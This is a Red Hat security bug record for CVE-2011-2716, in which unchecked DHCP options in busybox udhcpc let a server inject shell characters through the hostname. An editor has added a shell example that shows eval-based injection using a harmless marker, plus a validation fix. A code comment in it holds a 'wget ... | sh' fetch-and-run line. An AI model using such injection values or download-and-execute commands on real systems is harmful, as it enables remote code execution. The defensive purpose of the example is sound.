Bug 725364 (CVE-2011-2716)

Summary: CVE-2011-2716 busybox: udhcpc insufficient checking of DHCP options
Product: [Other] Security Response
Component: vulnerability
Status: CLOSED ERRATA
Severity: low
Priority: low
Version: unspecified
Hardware: All
OS: Linux
Keywords: Security
Reporter: Tomas Hoger <thoger>
Assignee: Red Hat Product Security <security-response-team>
CC: dvlasenk, jlieskov, maxamillion
Doc Type: Bug Fix
Last Closed: 2012-06-20 10:07:09 UTC
Bug Depends On: 731347, 768083, 772473, 790335, 800293, 802089
Bug Blocks: 722974, 742493, 784298

Description Tomas Hoger 2011-07-25 10:12:14 UTC
A missing DHCP option checking / sanitization flaw was reported for multiple DHCP clients.  This flaw may allow a DHCP server to trick DHCP clients into setting e.g. the system hostname to a specially crafted value containing shell special characters.  Various scripts assume that the hostname is trusted, which may lead to code execution when the hostname is specially crafted.

This issue was tracked in bug #689832 for ISC dhclient (CVE-2011-0997), which also discussed a few other affected clients.  This bug is created to track busybox's udhcpc separately.

Upstream bug report:
https://bugs.busybox.net/show_bug.cgi?id=3979

The busybox version in Red Hat Enterprise Linux 4 is not compiled with support for udhcpc.  The versions shipped with Red Hat Enterprise Linux 5 and 6 include udhcpc and are affected.  However, udhcpc is not used in Red Hat Enterprise Linux.

Comment 1 Tomas Hoger 2011-07-27 11:32:31 UTC
(In reply to comment #0)

> The versions shipped with Red Hat Enterprise Linux 5 and 6 include udhcpc and
> are affected.

To clarify the "affected" part...  udhcpc makes DHCP options supplied by the DHCP server available to the external script via environment variables.  The script can then configure DHCP options on the system in a platform specific way.  Red Hat Enterprise Linux busybox packages do not provide any such script. Example scripts that are part of the upstream busybox source tarball (examples/udhcp) do not set DHCP hostname on the system.
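
Worked example, added by the editor and not part of this bug report or of busybox: a POSIX sh script showing both halves of the problem described in the two comments above. udhcpc exports the options it received to its hook script as environment variables (option 12 arrives as $hostname, option 15 as $domain), so the values come straight from the network. The "unsafe" function below re-parses such a value with eval, the way a script that treats the hostname as trusted might; the "safe" functions apply an RFC 1123 character check before using the value, which is the kind of check a client or its script needs. The sample values, the function names, the output file path and the "bad" placeholder are constructed for this example and are not taken from the upstream fix.

```shell
#!/bin/sh
# Added example for CVE-2011-2716 (not busybox code, not from the bug report).
# udhcpc runs its hook script with DHCP options in the environment, e.g.
# $hostname (option 12). Anything there was chosen by the DHCP server.
LC_ALL=C; export LC_ALL

# Constructed sample values. A hostile server would send the second one;
# a real attacker would put something like '; wget http://.../x -O- | sh'
# after the ';'. The harmless INJECTED=yes lets the injection be observed
# without side effects.
GOOD_HOSTNAME='pc1.lab.example'
EVIL_HOSTNAME='pc1; INJECTED=yes'

# VULNERABLE: the option value is spliced into shell source and re-parsed.
# With the evil value the ';' ends the assignment and the remainder runs
# as a command. Prints "yes" if the injected command ran, "no" otherwise.
unsafe_record_hostname() {
    INJECTED=no
    eval "recorded_hostname=$1"
    echo "$INJECTED"
}

# RFC 1123 host name check: labels of [A-Za-z0-9-], 1-63 chars each, not
# starting or ending with '-', joined by single dots, <= 253 chars total.
# Returns 0 if $1 is acceptable, 1 otherwise. Pure POSIX sh (no regex, no
# external commands), so it can run inside an early-boot hook script.
is_valid_hostname() {
    name=$1
    [ -n "$name" ] && [ ${#name} -le 253 ] || return 1
    case $name in
        .*|*.|*..*) return 1 ;;          # leading, trailing or empty label
    esac
    rest=$name.                          # trailing dot terminates the loop
    while [ -n "$rest" ]; do
        label=${rest%%.*}
        rest=${rest#*.}
        [ ${#label} -ge 1 ] && [ ${#label} -le 63 ] || return 1
        case $label in
            -*|*-) return 1 ;;                 # hyphen at a label edge
            *[!A-Za-z0-9-]*) return 1 ;;       # ';', '$', '`', space, ...
        esac
    done
    return 0
}

# Client-side approach: validate the option before exporting it, and hand
# the script a known-harmless placeholder instead of a hostile value. The
# placeholder text "bad" is this example's choice.
sanitize_hostname() {
    if is_valid_hostname "$1"; then
        printf '%s\n' "$1"
    else
        printf '%s\n' "bad"
    fi
}

# SAFE consumer: validate, then pass the value only as quoted data and
# never through eval. Writes to a file ($2, default constructed path)
# instead of calling hostname(1) so it runs unprivileged. Returns 1 and
# writes nothing if the value is refused.
safe_record_hostname() {
    is_valid_hostname "$1" || return 1
    printf '%s\n' "$1" > "${2:-/tmp/dhcp-hostname.txt}"
}

# Demonstration on the constructed values (runs offline).
for h in "$GOOD_HOSTNAME" "$EVIL_HOSTNAME"; do
    if is_valid_hostname "$h"; then verdict=accepted; else verdict=refused; fi
    printf '%-20s -> %s; eval-based script injected: %s\n' \
        "$h" "$verdict" "$(unsafe_record_hostname "$h")"
done
```

The point of the split is that validation has to happen before the value is ever treated as shell text: once eval (or an unquoted expansion in a command position) sees the evil value, the check is too late. The character class is deliberately narrow; a hostname that fails it is refused or replaced rather than "cleaned", because partial escaping of shell metacharacters is where such fixes usually go wrong.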

Comment 2 Tomas Hoger 2011-07-27 11:33:33 UTC
Statement:

(none)

Comment 3 Tomas Hoger 2011-08-17 12:11:44 UTC
Created busybox tracking bugs for this issue

Affects: fedora-all [bug 731347]

Comment 4 Jan Lieskovsky 2011-12-13 13:08:59 UTC
Upstream patch:
http://git.busybox.net/busybox/commit/?id=7280d2017d8075267a12e469983e38277dcf0374

Comment 9 errata-xmlrpc 2012-02-21 03:21:01 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 5

Via RHSA-2012:0308 https://rhn.redhat.com/errata/RHSA-2012-0308.html

Comment 11 errata-xmlrpc 2012-06-20 07:16:11 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 6

Via RHSA-2012:0810 https://rhn.redhat.com/errata/RHSA-2012-0810.html